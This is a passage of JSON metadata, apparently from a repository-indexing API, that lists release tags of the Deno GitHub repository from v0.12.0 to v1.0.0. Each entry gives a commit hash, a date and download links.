","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id"